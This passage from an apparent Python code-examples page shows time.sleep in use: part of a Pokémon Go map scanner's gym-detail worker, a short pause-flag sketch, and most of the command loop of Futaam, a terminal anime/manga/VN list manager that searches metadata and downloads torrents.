                        # Can only get gym details within 1km of our position
                        distance = calc_distance(step_location, [gym['latitude'], gym['longitude']])
                        if distance < 1:
                            # check if we already have details on this gym (if not, get them)
                            try:
                                record = GymDetails.get(gym_id=gym['gym_id'])
                            except GymDetails.DoesNotExist as e:
                                gyms_to_update[gym['gym_id']] = gym
                                continue

                            # if we have a record of this gym already, check if the gym has been updated since our last update
                            if record.last_scanned < gym['last_modified']:
                                gyms_to_update[gym['gym_id']] = gym
                                continue
                            else:
                                log.debug('Skipping update of gym @ %f/%f, up to date', gym['latitude'], gym['longitude'])
                                continue
                        else:
                            log.debug('Skipping update of gym @ %f/%f, too far away from our location at %f/%f (%fkm)', gym['latitude'], gym['longitude'], step_location[0], step_location[1], distance)

                    if len(gyms_to_update):
                        gym_responses = {}
                        current_gym = 1
                        status['message'] = 'Updating {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        for gym in gyms_to_update.values():
                            status['message'] = 'Getting details for gym {} of {} for location {},{}...'.format(current_gym, len(gyms_to_update), step_location[0], step_location[1])
                            time.sleep(random.random() + 2)
                            response = gym_request(api, step_location, gym)

                            # make sure the gym was in range. (sometimes the API gets cranky about gyms that are ALMOST 1km away)
                            if response['responses']['GET_GYM_DETAILS']['result'] == 2:
                                log.warning('Gym @ %f/%f is out of range (%dkm), skipping', gym['latitude'], gym['longitude'], distance)
                            else:
                                gym_responses[gym['gym_id']] = response['responses']['GET_GYM_DETAILS']

                            # increment which gym we're on (for status messages)
                            current_gym += 1

                        status['message'] = 'Processing details of {} gyms for location {},{}...'.format(len(gyms_to_update), step_location[0], step_location[1])
                        log.debug(status['message'])

                        if gym_responses:
                            parse_gyms(args, gym_responses, whq)

                # Record the time and place the worker left off at
                status['last_scan_time'] = now()
                status['location'] = step_location

                # Always delay the desired amount after "scan" completion
                status['message'] += ', sleeping {}s until {}'.format(args.scan_delay, time.strftime('%H:%M:%S', time.localtime(time.time() + args.scan_delay)))
                time.sleep(args.scan_delay)

        # catch any process exceptions, log them, and continue the thread
        except Exception as e:
            status['message'] = 'Exception in search_worker using account {}. Restarting with fresh account. See logs for details.'.format(account['username'])
            time.sleep(args.scan_delay)
            log.error('Exception in search_worker under account {} Exception message: {}'.format(account['username'], e))
            account_failures.append({'account': account, 'last_fail_time': now(), 'reason': 'exception'})
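
Example 27 uses time.sleep in three distinct roles: a two-second poll while the pause flag is set, a one-second countdown while waiting for a scan window to open, and a fixed scan_delay after every completed scan. A stripped-down sketch of the pause-flag idiom using a threading.Event (do_scan and SCAN_DELAY are illustrative names, not taken from the project):

import threading
import time

pause_bit = threading.Event()   # set() to pause the worker, clear() to resume
SCAN_DELAY = 2                  # seconds to wait after every scan

def do_scan(step):
    print('scanning step', step)  # stand-in for the real map request

def worker():
    for step in range(3):
        while pause_bit.is_set():   # idle politely while paused
            time.sleep(2)
        do_scan(step)
        time.sleep(SCAN_DELAY)      # always delay after a scan

t = threading.Thread(target=worker)
t.start()
t.join()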

Example 28

Project: Futaam
Source File: text.py
View license
def main(argv, version):
    """The text interface's main method."""
    global PS1
    ANNInitRet = ANN.init()
    if ANNInitRet == 0:
        pass
    elif ANNInitRet == 1:
        print(COLORS.header + 'Updating metadata...' + COLORS.default)
        ANN.fetch_report(50)
    elif ANNInitRet == 2:
        print(COLORS.header + 'Updating ANN metadata cache for the first time...' + COLORS.default)
        ANN.fetch_report('all')
	
    # gather arguments
    dbfile = ARGS.database
    host = ''
    if ARGS.host:
        host = ARGS.host
    password = ''
    if ARGS.password:
        password = ARGS.password
    username = ''
    if ARGS.username:
        username = ARGS.username
    port = 8500
    if ARGS.port:
        port = ARGS.port
    hooks = []
    if ARGS.hooks:
        hooks = ARGS.hooks

    if len(dbfile) == 0 and host == '':
        print(COLORS.fail + 'No database specified' + COLORS.default)
        print('To create a database, use the argument "--create" or "-c" ' +\
              '(no quotes)')
        sys.exit(1)

    if host == '':
        dbs = []
        for filename in dbfile:
            dbs.append(parser.Parser(filename, hooks=hooks))
        currentdb = 0
    else:
        if username == '':
            if 'default.user' in CONFS:
                print('[' + COLORS.blue + 'info' + COLORS.default +\
				'] using default user')
                username = CONFS['default.user']
            else:
                username = input('Username for \'' + host + '\': ')
        if 'default.password' in CONFS:
            print('[' + COLORS.blue + 'info' + COLORS.default +\
            '] using default password')
            password = CONFS['default.password']
        else:
            password = getpass.getpass(
                'Password for \'' + username + '@' + host + '\': ')
        dbs = []
        try:
            dbs.append(
                parser.Parser(host=host, port=port, username=username,
				password=password, hooks=hooks))
        except Exception as exception:
            print('[' + COLORS.fail + 'error' + COLORS.default + '] ' +\
			str(exception).replace('305 ', ''))
            sys.exit(1)

        currentdb = 0

    print(COLORS.header + dbs[currentdb].dictionary['name'] + COLORS.default +\
	' (' + dbs[currentdb].dictionary['description'] + ')')
    print('Type help for cheat sheet')
    if len(dbs) > 1:
        print('Type switchdb to change to the next database')
    sys.stdout.write('\n')

    while True:
        try:
            now = datetime.datetime.now()
            ps1_replace = {'%N': dbs[currentdb].dictionary['name'], '%D':
			dbs[currentdb].dictionary['description'], '%h': now.strftime('%H'),
			'%m': now.strftime('%M'), chr(37) + 's': now.strftime(
            '%S'), '%blue%': COLORS.blue, '%green%': COLORS.green, '%red%':
			COLORS.fail, '%orange%': COLORS.warning, '%purple%': COLORS.header,
			'%default%': COLORS.default}
            ps1_temp = PS1
            ps1_temp = ps1_temp.replace('\%', '%' + chr(5))
            for replacer in ps1_replace:
                ps1_temp = ps1_temp.replace(replacer, ps1_replace[replacer])
            ps1_temp = ps1_temp.replace(chr(5), '')
            cmd = input(ps1_temp + COLORS.default).lstrip()
            cmdsplit = cmd.split(' ')
            args = ''
            for arg in cmdsplit[1:]:
                args += arg + ' '
            args = args[:-1].replace('\n', '')
        except (EOFError, KeyboardInterrupt):
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)

        if cmdsplit[0].lower() in ['q', 'quit']:
            print(COLORS.green + 'Bye~' + COLORS.default)
            sys.exit(0)
        elif cmdsplit[0].lower() in ['set_ps1', 'sps1']:
            args += ' '

            CONFS['PS1'] = args
            with open(CONFPATH, 'wb') as conf_file:
                conf_file.write(json.dumps(CONFS))
                conf_file.close()
            PS1 = args
        elif cmdsplit[0].lower() in ['help', 'h']:
            print(COLORS.header + 'Commands' + COLORS.default)
            print('\thelp or h \t\t - prints this')
            print('\tquit or q \t\t - quits')
            print('\tset_ps1 or sps1 \t - changes PS1')
            print('\tswitchdb or sdb \t - changes working database when ' +\
                'opened with multiple files')
            print('\tadd or a \t\t - adds an entry')
            print('\tlist or ls\t\t - lists all entries')
            print('\tdelete, del or d \t - deletes an entry with the given ' +\
                'index')
            print('\tedit or e \t\t - edits an entry')
            print('\tinfo or i\t\t - shows information on an entry')
            print('\toinfo or o\t\t - shows online information on an entry ' +\
                '(if given entry number) or name')
            print('\tpicture, pic, image, img - shows an image of the entry ' +\
                'or name')
            print('\tnyaa or n\t\t - searches nyaa.eu for torrent of an ' +\
                'entry (if given entry number) or name')
            print('\tsort or s\t\t - swaps or moves entries around')
            print('\tfilter, f or search\t - searches the database (by ' +\
                'name/genre/obs/type/lastwatched)')
            print('')
        elif cmdsplit[0].lower() in ['switchdb', 'sdb']:
            try:
                currentdb += 1
                repr(dbs[currentdb])
            except IndexError:
                currentdb = 0
            print('Current database: ' + COLORS.header + dbs[
			currentdb].dictionary['name'] + COLORS.default + ' (' + dbs[
			currentdb].dictionary['description'] + ')')
        elif cmdsplit[0].lower() in ['l', 'ls', 'list']:
            if len(dbs[currentdb].dictionary['items']) == 0:
                print(COLORS.warning +\
				'No entries found! Use "add" for adding one' + COLORS.default)
                continue
            else:
                for entry in sorted(dbs[currentdb].dictionary['items'],
				key=lambda x: x['id']):
                    rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                     COLORS.green, 'h': COLORS.warning, 'q': COLORS.header}

                    if entry['status'].lower() in rcolors:
                        sys.stdout.write(rcolors[entry['status'].lower()])
                    if os.name != 'nt':
                        print('\t' + str(entry['id']) + ' - [' +\
						entry['status'].upper() + '] ' + entry['name'] +\
						COLORS.default)
                    else:
                        print('\t' + str(entry['id']) +\
						' - [' + entry['status'].upper() + '] ' +\
						entry['name'].encode('ascii', 'ignore') +\
						COLORS.default)
        elif cmdsplit[0].lower() in ['search', 'filter', 'f']:
            if len(cmdsplit) < 3:
                print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                print('Where <filter> is ' +\
                    'name/genre/lastwatched/status/obs/type')
            else:
                if cmdsplit[1].lower() in ['name', 'genre', 'lastwatched',
				'status', 'obs', 'type']:
                    for entry in sorted(dbs[currentdb].dictionary['items'], \
					key=lambda x: x['id']):
                        if ' '.join(cmdsplit[2:]).lower() in \
						entry[cmdsplit[1].lower()].lower():
                            rcolors = {'d': COLORS.fail, 'c': COLORS.blue, 'w':
                                       COLORS.green, 'h': COLORS.warning, 'q':
									   COLORS.header}

                            if entry['status'].lower() in rcolors:
                                sys.stdout.write(
                                    rcolors[entry['status'].lower()])
                            if os.name != 'nt':
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'] + COLORS.default)
                            else:
                                print('\t' + str(entry['id']) + ' - [' +\
								entry['status'].upper() + '] ' +\
								entry['name'].encode('ascii', 'ignore') +\
								COLORS.default)
                else:
                    print('Usage: ' + cmdsplit[0] + ' <filter> <terms>')
                    print('Where <filter> is name/genre/lastwatched/status/obs')
        elif cmdsplit[0].lower() in ['d', 'del', 'delete']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue
            confirm = ''
            while (confirm in ['y', 'n']) == False:
                confirm = input(
                    COLORS.warning + 'Are you sure? [y/n] ' +\
					COLORS.default).lower()
            dbs[currentdb].dictionary['items'].remove(entry)
            dbs[currentdb].dictionary['count'] -= 1

            rebuild_ids(dbs[currentdb])

        elif cmdsplit[0].lower() in ['image', 'img', 'picture', 'pic', 'pix']:
            accepted = False
            if args.isdigit():
                if args >= 0 and len(dbs[currentdb].dictionary['items']) >=\
                int(args):
                    eid = dbs[currentdb].dictionary['items'][int(
                    args)]['aid']
                    etype = dbs[currentdb].dictionary[
                    'items'][int(args)]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args +\
				    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                    COLORS.bold + '<Anime, Manga or VN> ' +\
                    COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                   'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii',
                            'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default
                    ).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]
                            eid = malanime['id']
                            etype = entry_type
                            accepted = True
            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                    'vn', 'basic,details', '(id=' + str(eid) + ')', '')\
                    ['items'][0]
                print(COLORS.header + 'Fetching image, please stand by...' +\
				COLORS.default)
                utils.showImage(
                deep[('image_url' if etype != 'vn' else 'image')])
        
        elif cmdsplit[0].lower() in ['s', 'sort']:
            if len(cmdsplit) != 4:
                print('Invalid number of arguments')
                print('Must be:')
                print('	(s)ort [(s)wap/(m)ove] [index] [index]')
                print('')
                print('When moving, first index should be "from entry" and ' +\
                    'second index should be "to entry"')
                continue

            if (cmdsplit[2].isdigit() == False) or\
			(cmdsplit[3].isdigit() == False):
                print(COLORS.fail + 'Indexes must be digits' + COLORS.default)
                continue

            if cmdsplit[1].lower() in ['swap', 's']:
                # Swap ids
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[2])]['id'] = int(cmdsplit[3])
                dbs[currentdb].dictionary['items'][
                    int(cmdsplit[3])]['id'] = int(cmdsplit[2])

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Save
                dbs[currentdb].save()
            elif cmdsplit[1].lower() in ['move', 'm']:
                # Fool ids
                dbs[currentdb].dictionary['items'][int(cmdsplit[2])][
                    'id'] = float(str(int(cmdsplit[3]) - 1) + '.5')

                # Re-sort
                dbs[currentdb].dictionary['items'] = sorted(
                    dbs[currentdb].dictionary['items'], key=lambda x: x['id'])

                # Rebuild ids now that we have them in order
                rebuild_ids(dbs[currentdb])

            else:
                print(COLORS.warning + 'Usage: (s)ort [(s)wap/(m)ove] ' +\
                    '[index] [index]' + COLORS.default)
                continue

        elif cmdsplit[0].lower() in ['info', 'i']:
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            if entry['type'].lower() in ['anime', 'manga']:
                if entry['type'].lower() == 'anime':
                    t_label = 'Last watched'
                else:
                    t_label = 'Last chapter/volume read'
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], t_label:
                           entry['lastwatched'], 'Status':
                           utils.translated_status[entry['type']][entry[
                           'status'].lower()]}
            elif entry['type'].lower() == 'vn':
                toprint = {'Name': entry['name'], 'Genre': entry['genre'],
                           'Observations': entry['obs'], 'Status':
                            utils.translated_status[entry['type']][entry[
                            'status'].lower()]}

            for k in toprint:
                if os.name != 'nt':
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    str(toprint[k]))
                else:
                    print(COLORS.bold + '<' + k + '>' + COLORS.default + ' ' +\
                    toprint[k].encode('ascii', 'ignore'))

        elif cmdsplit[0].lower() in ['edit', 'e']:
            # INTRO I
            entry = pick_entry(args, dbs[currentdb])
            if entry == None:
                continue

            # INTRO II
            if os.name != 'nt':
                n_name = input(
                    '<Name> [' + entry['name'].encode('utf8') + '] ').replace(
                    '\n', '')
            else:
                n_name = input(
                    '<Name> [' + entry['name'].encode('ascii', 'ignore') + '] '
                    ).replace('\n', '')

            if entry['type'].lower() != 'vn':
                n_genre = input(
                    '<Genre> [' + entry['genre'].decode('utf8') + '] '
                    ).replace('\n', '')
            else:
                n_genre = ''

            # ZIGZAGGING
            n_lw = None
            n_status = None
            if entry['type'] == 'anime':
                n_status = "placeholder"
                while (n_status in ['w', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [W/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                n_lw = input(
                    '<Last episode watched> [' + entry['lastwatched'] +\
                    ']>'.replace('\n', ''))
            elif entry['type'] == 'manga':
                n_status = "placeholder"
                while (n_status in ['r', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [R/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'r':
                    n_status = 'w'
                n_lw = input(
                    '<Last page/chapter read> [' + entry['lastwatched'] +\
                    ']> ').replace('\n', '')
            elif entry['type'] == 'vn':
                n_status = "placeholder"
                while (n_status in ['p', 'c', 'q', 'h', 'd', '']) == False:
                    n_status = input(
                        '<Status> [P/C/Q/H/D] [' + entry['status'].upper() +\
                        '] ').replace('\n', '').lower()
                if n_status == 'p':
                    n_status = 'w'
                n_lw = ''

            # EXTENDED SINGLE NOTE
            n_obs = input('<Observations> [' + entry['obs'] + ']> ')

            # BEGIN THE SOLO
            if n_name == '':
                n_name = entry['name']
            dbs[currentdb].dictionary['items'][int(args)]['name'] =\
            utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_name))
            if n_genre == '' and entry['type'].lower() != 'vn':
                n_genre = entry['genre']
            if entry['type'].lower() != 'vn':
                dbs[currentdb].dictionary['items'][int(args)]['genre'] =\
                utils.HTMLEntitiesToUnicode(utils.remove_html_tags(n_genre))
            if n_status != None:
                if n_status == '':
                    n_status = entry['status']
                dbs[currentdb].dictionary['items'][
                    int(args)]['status'] = n_status
                if n_lw == '':
                    n_lw = entry['lastwatched']
                dbs[currentdb].dictionary['items'][
                    int(args)]['lastwatched'] = n_lw
            if n_obs == '':
                n_obs = entry['obs']
            dbs[currentdb].dictionary['items'][int(args)]['obs'] = n_obs

            # Peaceful end
            dbs[currentdb].save()
            print(COLORS.green + 'Done' + COLORS.default)
            continue
        elif cmdsplit[0].lower() in ['n', 'nyaa']:
            if args.isdigit():
                if args >= 0 and\
                len(dbs[currentdb].dictionary['items']) >= int(args):
                    term = dbs[currentdb].dictionary[
                        'items'][int(args)]['name']

                    if dbs[currentdb].dictionary['items'][int(args)]['type'\
                    ].lower() == 'anime':
                        if dbs[currentdb].dictionary['items'][int(args)][\
                        'status'].lower() == 'c':
                            if dbs[currentdb].dictionary['items'][int(args)][\
                            'lastwatched'].isdigit():
                                choice = ''
                                while (choice in ['y', 'n']) == False:
                                    choice = input(COLORS.bold +\
                                    'Do you want to search for the next ' +\
                                     'episode (' + str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1) +\
                                        ')? [Y/n] ' + COLORS.default).lower()
                                    if choice.replace('\n', '') == '':
                                        choice = 'y'

                                if choice == 'y':
                                    new_lw = str(
                                        int(dbs[currentdb].dictionary['items'][
                                        int(args)]['lastwatched']) + 1)
                                    if len(str(new_lw)) == 1:
                                        new_lw = '0' + new_lw
                                    term = term + ' ' + new_lw

                else:
                    print(COLORS.fail + 'The entry ' + args +\
                    ' is not on the list' + COLORS.default)
                    continue
            else:
                term = args

            print(COLORS.header + 'Searching NYAA.eu for "' + term +\
            '"...' + COLORS.default)
            search_results = NYAA.search(term)
            print('')

            if len(search_results) == 0:
                print(COLORS.fail + 'No results found' + COLORS.default)
                continue

            i = 0
            for result in search_results[:15]:
                if os.name != 'nt':
                    print(COLORS.bold + '[' + str(i) + '] ' +\
                    COLORS.default + result['title'])
                else:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'].encode('ascii', 'ignore'))
                i += 1
            print('[C] Cancel')

            has_picked = False
            while has_picked == False:  # Ugly I know
                which = input(
                    COLORS.bold + 'Choose> ' + COLORS.default).replace('\n', '')
                if which.lower() == 'c':
                    break

                if which.isdigit():
                    if int(which) <= len(search_results) and int(which) <= 15:
                        picked = search_results[int(which)]
                        has_picked = True

            if has_picked:
                print('')
                if os.name == 'nt':
                    for key in picked:
                        picked[key] = picked[key].encode('ascii', 'ignore')
                print(COLORS.bold + '<Title> ' + COLORS.default +\
                picked['title'])
                print(COLORS.bold + '<Category> ' + COLORS.default +\
                picked['category'])
                print(COLORS.bold + '<Info> ' + COLORS.default +\
                picked['description'])
                print(COLORS.bold + '<URL> ' + COLORS.default + picked['url'])

                print('')
                choice = ''
                while (choice in ['t', 'd', 'n', 'r']) == False:
                    print(COLORS.bold + '[T] ' + COLORS.default +\
                    'Download .torrent file')
                    print(COLORS.bold + '[D] ' + COLORS.default +\
                    'Download all files (simple torrent client)')
                    print(COLORS.bold + '[R] ' + COLORS.default +\
                    'Load and start on rTorrent (xmlrpc)')
                    print(COLORS.bold + '[N] ' + COLORS.default +\
                    'Do nothing')
                    choice = input(
                        COLORS.bold + 'Choose> ' + COLORS.default).lower()

                if choice == 'r':
                    if os.name == 'nt':
                        print(COLORS.fail + 'Not available on Windows' +\
                        COLORS.default)
                        continue

                    try:
                        server = rtorrent_xmlrpc.SCGIServerProxy(
                            'scgi://localhost:5000/')
                        time.sleep(1)
                        server.load_start(picked['url'])
                        time.sleep(.5)
                        print(COLORS.green + 'Success' + COLORS.default)
                    except:
                        print(COLORS.fail + 'Error while connecting or adding ' +\
                        'torrent to rTorrent' + COLORS.default)
                        print(COLORS.warning + 'ATTENTION: for this to work ' +\
                        'you need to add the following line to ~/.rtorrent.rc:')
                        print('\tscgi_port = localhost:5000')
                        print('')
                        print('And rTorrent needs to be running' +\
                        COLORS.default)
                        continue
                elif choice == 't':
                    metadata = urlopen(picked['url']).read()

                    while True:
                        filepath = input(
                            COLORS.bold + 'Save to> ' +\
                            COLORS.default).replace('\n', '')
                        try:
                            metadata_file = open(filepath, 'wb')
                            metadata_file.write(metadata)
                            metadata_file.close()
                        except IOError as error:
                            print(COLORS.fail + 'Failed to save file' +\
                            COLORS.default)
                            print(COLORS.fail + 'Exception! ' + str(error) +\
                            COLORS.default)
                            print('Retrying...')
                            print('')
                            continue
                        break

                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last ' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][
                            int(args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field ' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(
                                    int(dbs[currentdb].dictionary['items'][
                                    int(args)]['lastwatched']) + 1)
                                dbs[currentdb].save()

                if choice == 'd':
                    try:
                        import libtorrent as lt
                    except ImportError:
                        print(COLORS.fail +\
                        'libTorrent Python bindings not found!' +\
                        COLORS.default)
                        print('To install it check your distribution\'s' +\
                        ' package manager (python-libtorrent for Debian' +\
                        ' based ones) or compile libTorrent with the ' +\
                        '--enable-python-binding')
                        continue

                    print(COLORS.header + 'Downloading to current folder...' +\
                    COLORS.default)

                    ses = lt.session()
                    ses.listen_on(6881, 6891)
                    decoded = lt.bdecode(urlopen(picked['url']).read())
                    info = lt.torrent_info(decoded)
                    torrent_handle = ses.add_torrent(info, "./")

                    while (not torrent_handle.is_seed()):
                        status = torrent_handle.status()

                        state_str = [
                            'queued', 'checking', 'downloading metadata',
                            'downloading', 'finished', 'seeding', 'allocating',
                            'checking resume data']
                        sys.stdout.write(
                            ('\r\x1b[K%.2f%% complete (down: %.1f kb/s up: ' +
                             '%.1f kB/s peers: %d) %s') %
                            (status.progress * 100, status.download_rate / 1000,
                             status.upload_rate / 1000,
                            status.num_peers, state_str[status.state]))
                        sys.stdout.flush()

                        time.sleep(1)
                    print('')
                    print('Done')

                    if args.isdigit():
                        choice = ''
                        while not (choice in ['y', 'n']):
                            choice = input(
                                'Would you like me to increment the last ' +\
                                'watched field? [Y/n] ').lower()

                        if choice == 'y':
                            if not dbs[currentdb].dictionary['items'][int(
                            args)]['lastwatched'].isdigit():
                                print(COLORS.error + 'The last watched field ' +\
                                'on this entry is apparently not a digit,')
                                print('will not proceed.' + COLORS.default)
                            else:
                                dbs[currentdb].dictionary['items'][int(args)][
                                'lastwatched'] = str(int(dbs[currentdb
                                ].dictionary['items'][int(args)][
                                'lastwatched']) + 1)
                                dbs[currentdb].save()

        elif cmdsplit[0].lower() in ['o', 'oinfo']:
            accepted = False
            if args.split(' ')[0].isdigit():
                if (int(args.split(' ')[0]) >= 0) and (len(dbs[currentdb].dictionary['items']) >= int(args.split(' ')[0])):
                    eid = dbs[currentdb].dictionary['items'][int(args.split(' ')[0])]['aid']
                    etype = dbs[currentdb].dictionary[
                        'items'][int(args.split(' ')[0])]['type']
                    accepted = True
                else:
                    print(COLORS.fail + 'The entry ' + args.split(' ')[0] +\
                    ' is not on the list' + COLORS.default)
            else:
                title = args

                entry_type = ''
                while (entry_type in ['anime', 'manga', 'vn']) == False:
                    entry_type = input(
                        COLORS.bold + '<Anime, Manga or VN> ' +\
                        COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, True)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                if os.name == 'nt':
                    for result in search_results:
                        for key in result:
                            result[key] = result[key].encode('ascii', 'ignore')
                i = 0
                for result in search_results:
                    print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                    result['title'])
                    i += 1
                print(COLORS.bold + '[A] ' + COLORS.default + 'Abort')
                while accepted == False:
                    which = input(
                        COLORS.bold + 'Choose> ' +\
                        COLORS.default).replace('\n', '')
                    if which.lower() == 'a':
                        break
                    if which.isdigit():
                        if int(which) <= len(search_results):
                            malanime = search_results[int(which)]

                            eid = malanime['id']
                            etype = entry_type
                            accepted = True

            if accepted:
                if etype in ['anime', 'manga']:
                    deep = ANN.details(eid, etype)
                elif etype == 'vn':
                    deep = VNDB.get(
                        'vn', 'basic,details', '(id=' + str(eid) + ')', '')[
                        'items'][0]

                if os.name == 'nt':
                    for key in deep:
                        deep[key] = deep[key].encode('ascii', 'ignore')

                if etype == 'anime':
                    alternative_title = (' (' + deep['other_titles'].get('japanese') + ')' \
                        if deep['other_titles'].get('japanese', '') != '' \
                        else '') if isinstance(deep['other_titles'].get('japanese', ''), str) \
                        else (' (' + '/'.join(deep['other_titles'].get('japanese', [])) + ')' if \
                        len(deep['other_titles'].get('japanese', [])) > 0 else '')
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'] + alternative_title)
                    if deep['end_date'] != None:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ' + deep['end_date'])
                    else:
                        print(COLORS.bold + 'Year: ' + COLORS.default +\
                        deep['start_date'] + ' - ongoing')
                    print(COLORS.bold + 'Type: ' + COLORS.default + deep['type'])
                    if deep.get('classification', None) != None:
                        print(COLORS.bold + 'Classification: ' + COLORS.default +\
                        deep['classification'])
                    print(COLORS.bold + 'Episodes: ' + COLORS.default +\
                    str(deep['episodes']))
                    if deep.get('synopsis', None) != None:
                        print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                        utils.remove_html_tags(deep['synopsis']))
                    print(COLORS.bold + 'Picture available: ' + COLORS.default + \
                        ('yes' if deep['image_url'] != '' else 'no'))
                    print('')
                    if len(deep['OPsongs']) > 0:
                        print(COLORS.bold + 'Opening' + \
                            ('s' if len(deep['OPsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['OPsongs'][0])
                        for song in deep['OPsongs'][1:]: 
                            print((' ' * 10) + song)

                    if len(deep['EDsongs']) > 0:
                        print(COLORS.bold + 'Ending' + \
                            ('s' if len(deep['EDsongs']) > 1 else '') + \
                            ': ' + COLORS.default + deep['EDsongs'][0])
                        for song in deep['EDsongs'][1:]:
                            print((' ' * 9) + song)
                    print('')
                    print(COLORS.bold + 'Studio' +\
                        ('s' if len(deep['credit']) > 1 else '') + ': ' + \
                        COLORS.default + (' / '.join(deep['credit'])))
                    print('')
                    print(COLORS.bold + 'Character list:' + COLORS.default)
                    for character in deep['characters']:
                        print('\t' + character + ' (voiced by ' + \
                            deep['characters'][character] + ')')
                    print('')
                    print(COLORS.bold + 'Episode list:' + COLORS.default)
                    for ep in sorted(deep['episode_names'], key=lambda x: int(x)):
                        print('\t #' + ep + ' ' + \
                            deep['episode_names'][ep])
                    print('')
                    print(COLORS.bold + 'Staff list:' + COLORS.default)
                    if '--full' in cmdsplit:
                        amount = len(deep['staff'])
                    else: amount = 7
                    i = 0
                    for staff in deep['staff']:
                        print('\t' + staff + ' (' + deep['staff'][staff] + ')')
                        i += 1
                        if i >= amount and len(deep['staff']) > amount:
                            print(COLORS.bold + '\tThere are ' + str(len(deep['staff']) - amount) + \
                             ' other staff members, use "' + COLORS.default + cmd + ' --full"' +\
                             COLORS.bold + ' to see more')
                            break

                elif etype == 'manga':
                    print(COLORS.bold + 'Title: ' + COLORS.default +\
                    deep['title'])
                    print(COLORS.bold + 'Chapters: ' + COLORS.default +\
                    str(deep['episodes']))
                    print(COLORS.bold + 'Synopsis: ' + COLORS.default +\
                    utils.HTMLEntitiesToUnicode(
                     utils.remove_html_tags(deep['synopsis'])))
                elif etype == 'vn':
                    if len(deep['aliases']) == 0:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'])
                    else:
                        print(COLORS.bold + 'Title: ' + COLORS.default +\
                        deep['title'] + ' [' +\
                        deep['aliases'].replace('\n', '/') + ']')
                        platforms = []
                    for platform in deep['platforms']:
                        names = {
                            'lin': 'Linux', 'mac': 'Mac', 'win': 'Windows'}
                        if platform in names:
                            platform = names[platform]
                        else:
                            platform = platform[0].upper() + platform[1:]
                        platforms.append(platform)
                    print(COLORS.bold + 'Platforms: ' + COLORS.default +\
                    ('/'.join(platforms)))
                    print(COLORS.bold + 'Released: ' + COLORS.default +\
                    deep['released'])
                    print(COLORS.bold + 'Languages: ' + COLORS.default +\
                    ('/'.join(deep['languages'])))
                    print(COLORS.bold + 'Description: ' + COLORS.default +\
                    deep['description'])

                print('')

        elif cmdsplit[0].lower() in ['add', 'a']:
            online = False
            repeat = True
            title = ''
            entry_type = ''
            while repeat:
                repeat = False
                if title == '':
                    while title == '':
                        title = input(
                            COLORS.bold + '<Title> ' + COLORS.default).replace('\n', '')
                    entry_type = ''
                    while (entry_type in ['anime', 'manga', 'vn']) == False:
                        entry_type = input(
                            COLORS.bold + '<Anime, Manga or VN> ' +\
                            COLORS.default).lower()

                if entry_type in ['anime', 'manga']:
                    search_results = ANN.search(title, entry_type, online)
                elif entry_type == 'vn':
                    search_results = VNDB.get(
                        'vn', 'basic', '(title~"' + title + '")', '')['items']
                i = 0
                for result in search_results:
                    if os.name != 'nt':
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'])
                    else:
                        print(COLORS.bold + '[' + str(i) + '] ' + COLORS.default +\
                        result['title'].encode('ascii', 'ignore'))
                    i += 1
                if len(search_results) == 0:
